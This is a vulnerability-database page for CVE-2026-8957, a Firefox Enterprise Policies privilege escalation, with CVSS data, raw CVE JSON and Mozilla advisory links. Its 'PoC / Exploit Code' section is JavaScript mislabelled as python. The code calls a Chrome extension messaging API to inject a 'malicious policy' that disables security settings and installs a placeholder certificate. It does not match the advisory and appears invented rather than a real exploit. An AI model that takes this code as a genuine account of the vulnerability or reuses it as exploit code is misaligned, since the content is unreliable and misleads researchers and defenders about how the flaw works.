Security Vulnerability Report
中文
CVE-2026-8957 CVSS 6.5 MEDIUM

CVE-2026-8957

Published: 2026-05-19 14:16:52
Last Modified: 2026-05-19 15:16:35

Description

Privilege escalation in the Enterprise Policies component. This vulnerability was fixed in Firefox 151 and Firefox ESR 140.11.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Firefox < 151
Firefox ESR < 140.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// Conceptual Proof of Concept for CVE-2026-8957 // This script demonstrates a potential method to trigger the privilege escalation // by crafting a malicious policy payload targeting the Enterprise Policy component. function exploitCVE_2026_8957() { // Step 1: Define a malicious policy object that attempts to override security settings const maliciousPolicy = { "policies": { "DisableSecuritySettings": true, "InstallAddons": { "Default": true }, "Certificates": { "Install": [ "[Malicious_Certificate_Location]" ] } } }; // Step 2: Attempt to inject the policy // In a real-world scenario, this might involve DOM manipulation or // abusing a specific API endpoint exposed to the web context. try { // Simulating the internal message passing to the policy engine if (window.chrome && window.chrome.runtime) { window.chrome.runtime.sendMessage('enterprise-policy-id', maliciousPolicy, (response) => { console.log("Policy injection status:", response); }); } else { // Fallback for demonstration: Log the payload structure console.log("[PoC] Malicious Policy Payload Generated:", JSON.stringify(maliciousPolicy)); console.log("[PoC] Attempting to trigger Enterprise Policy handler..."); } } catch (error) { console.error("[PoC] Exploit failed:", error); } } // Execute the concept PoC exploitCVE_2026_8957();

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-8957", "sourceIdentifier": "[email protected]", "published": "2026-05-19T14:16:52.057", "lastModified": "2026-05-19T15:16:35.010", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Privilege escalation in the Enterprise Policies component. This vulnerability was fixed in Firefox 151 and Firefox ESR 140.11."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=2033850", "source": "[email protected]"}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-46/", "source": "[email protected]"}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-48/", "source": "[email protected]"}]}}